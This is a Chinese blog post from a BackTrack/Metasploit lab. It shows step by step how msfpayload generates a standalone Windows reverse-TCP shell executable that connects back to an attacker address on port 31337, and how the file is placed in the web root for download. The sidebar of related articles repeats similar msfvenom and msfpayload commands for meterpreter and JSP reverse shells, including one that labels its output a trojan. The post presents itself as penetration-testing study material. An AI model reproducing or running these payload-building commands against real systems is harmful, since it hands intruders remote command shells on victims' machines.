metasploit的msfpayload创建可独立运行的二进制文件

最新推荐文章于 2024-05-13 10:45:53 发布
最新推荐文章于 2024-05-13 10:45:53 发布
阅读量3.7k 收藏
点赞数
分类专栏: backtrack metasploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/feier7501/article/details/8865201
版权 
root@bt:~# msfpayload windows/shell_reverse_tcp O

       Name: Windows Command Shell, Reverse TCP Inline
     Module: payload/windows/shell_reverse_tcp
    Version: 14774
   Platform: Windows
       Arch: x86
Needs Admin: No
 Total size: 314
       Rank: Normal

Provided by:
  vlad902 <vlad902@gmail.com>
  sf <stephen_fewer@harmonysecurity.com>

Basic options:
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique: seh, thread, process, none
LHOST                      yes       The listen address
LPORT     4444             yes       The listen port

Description:
  Connect back to attacker and spawn a command shell


root@bt:~#


输入的命令,不是数字0,而是字母O,大写的O。

上面的命令是显示攻击载荷生成器有哪些选项。


然后生成exe文件:


root@bt:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.1.11 LPORT=31337 X > /var/www/payload1.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/shell_reverse_tcp
 Length: 314
Options: {"LHOST"=>"192.168.1.11", "LPORT"=>"31337"}
root@bt:~# ll /var/www/
total 77
drwxr-xr-x  3 root root    60 2013-04-28 03:52 ./
drwxr-xr-x 20 root root   120 2011-06-08 09:16 ../
-rw-r--r--  1 root root   177 2011-05-10 03:45 index.html
-rw-r--r--  1 root root 73802 2013-04-28 03:52 payload1.exe
drwxr-xr-x  2 root root   465 2011-05-10 03:44 wstool/
root@bt:~# file /var/www/payload1.exe 
/var/www/payload1.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
root@bt:~#


feier7501
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
有趣的二进制
03-28
有趣的二进制:软件安全与逆向分析》通过逆向工程,揭开人们熟知的软件背后...原作者在阅读了《有趣的二进制:软件安全与逆向分析》之后,将其中重要的点做了笔记,且亲自实验,并附详细的说明,可当作逆向入门手册阅读
Metasploit可执行后门.doc
12-01
Metasploit可执行后门是指使用Metasploit框架生成的可执行文件,它可以在目标系统上执行恶意代码,从而获取系统的控制权。这种类型的后门通常用于渗透测试和漏洞利用,旨在帮助安全测试人员和渗透测试专家评估系统的...
BT5 msf msfpayload生成2进制 msf生成exe meterpreter监听
weixin_30708329的博客
10-15 105
BT5 msf msfpayload生成2进制 msf生成exemsfpayload windows/meterpreter/reverse_tcp LHOST=192.168.85.147 LPORT=4444 X >/root/Desktop/mt.exe其它脚本msfpayload java/jsp_shell_reverse_tcp LHOST=58.60.195.226 LPOR...
msf-Windows payload
zzzzzyx_的博客
05-23 324
msfconsole 启动metasploit 然后 windows系统 msfvenom -p windows/meterpreter/reverse_tcp LHOST= _你的IP地址_ LPORT= _你的木马的IP地址_ -f exe > muma.exe 就这么一个不算文章的烂文章 您们也就不要赏钱了 下面????????的是坑钱的 其实我是一个 12 岁的 球娃 ...
【渗透测试笔记】之【MSF 生成payload】_msf payload 生成c++
最新发布
2401_84968665的博客
05-13 269
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
msf--基于msiexe+txt的载荷执行
gclome的博客
07-22 372
0x00设备: 两台虚拟机 一台kali(ip为122.122.10.122)生成载荷 一台windows主机(目标机器) kali端 第一阶段 1.ifcongfig 查看本机ip 2.打开msfmsfconsole 3.做一个服务器,处理人家反弹过来的东西,可以放在阿里云主机上use expoit/multi/handler 4.利用一个载荷set payload windows/meterp...
msf生成raw
SHELLCODE_8BIT的博客
12-13 1051
msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.250.1 LPORT=5555 -f raw -o msf.bin
MSF使用教程
huangyongkang666的博客
03-26 9605
MSF使用教程 1.简介 ​ Metasploit是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新。被安全社区冠以“可以黑掉整个宇宙”之名的强大渗透测试框架。 2.MSF模块介绍 1.辅助模块 auxiliary 负责执行信息收集、扫描、嗅探、指纹识别、口令猜测和Dos攻击等功能 2.渗透攻击模块exploits 利用系统漏洞进行攻击的动作,此模块对应每一个具体漏洞的攻击方法(主动、被动) ​ 主动渗透攻击:发送网络数据,触发安全漏洞。比如web应用程序渗透攻击、SCADA工业控制系
有趣的二进制_软件安全与逆向分析
03-06
《有趣的二进制:软件安全与逆向分析》通过逆向工程,揭开人们熟知的软件背后的机器语言的秘密,并教给读者读懂这些二进制代码的方法。理解了这些方法,技术人员就能有效地Debug,防止软件受到恶意攻击和反编译。...
MSF-Shellcode生成和使用
weixin_34301307的博客
11-12 4677
1使用环境 Kali 2.0 msfvenom 2Msfvenom参数说明 msfvenom –h 查看帮助 说明: Options: -p, --payload <payload>指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用&...
Metasploit(msf)系列-木马生成
热门推荐
chaojixiaojingang
09-28 3万+
原理: 利用msf模块中的msfvenom模块,首先生成.exe木马文件,用靶机打开,攻击成功后,就渗透到了靶机系统中。 msfvenom命令行选项如下: Options:     -p, --payload    &lt;payload&gt;       指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用&amp;#039;-&amp;#039;或者s...
Metasploit 生成***反弹shell
weixin_34372728的博客
04-27 2488
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报特点:这种可以扩展的模型将负载控制,编码器,无操作生成器和漏洞整合在一起,使 Metasploit Framework 成为一种研究高危漏洞的途径。它集成了各平台上常见的溢出漏洞和流行的 shellcode ,并且不断更新。最新版本的...
谈谈Metasploitpayload模块
Louisnie
10-20 2789
我们可以不利用漏洞,直接将payload发送给目标主机,诱使其点击,也可获取到目标主机的shell. msf &amp;gt; use payload/windows/shell_bind_tcp #使用该模块绑定(监听)本机的一个TCP连接端口 msf payload(windows/shell_bind_tcp) &amp;gt; generate #通过generate生成16进值的payload,默...
metasploit payload模块介绍
星落的博客
05-19 1万+
generate命令介绍 -b 过滤坏字符 '\x00,\xff' -e 指定将要使用的加密技术(show encoder查看加密模块) -f 指定输出文件格式 -h 查看帮助信息 -i 设置加密payload的次数 -k 提高速度 -x 指定自定义可执行文件作为模板 -o 设置输出文件名称 实例演示-生成木马 1.查看metasploit集成的payload show payload 2.使用反弹的payload use payload windows/shell...
metasploit进阶3
mingyqf的博客
02-28 173
参考:https://longwaer.blog.csdn.net/article/details/122751394 域信息收集 常用信息收集模块 auxiliary/scanner/discovery/arp_sweep #基于arp协议发现内网存活主机,这不能通过代理使用 auxiliary/scanner/portscan/ack #基于tcp的ack回复进行端口扫描,默认扫描1-10000端口 auxiliary/scanner/portscan/tcp #基于tcp进行端口扫描,默认扫描1-10
Msfpayload
天元喜羊羊的博客
07-09 2148
http://www.offensive-security.com/metasploit-unleashed/Msfpayload msfpayload is a command-line instance of Metasploit that is used to generate and output all of the various types of shellco
linux上无法执行二进制文件(无法执行java命令行)
欧阳小白闯天涯
03-23 1万+
下载jdk位数与linux位数不符合 解决:查看linux位数下载相同位数的jdk即可。具体命令请自查 原文:http://blog.maptoface.com/post/14
Msf payload creator
10-21
Msf Payload Creator是一款基于Metasploit框架的开源工具,用于生成各种类型的Metasploit兼容的恶意软件载荷。它可以生成多种类型的载荷,包括反向TCP、HTTP和HTTPS shell等。使用Msf Payload Creator,用户可以轻松...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值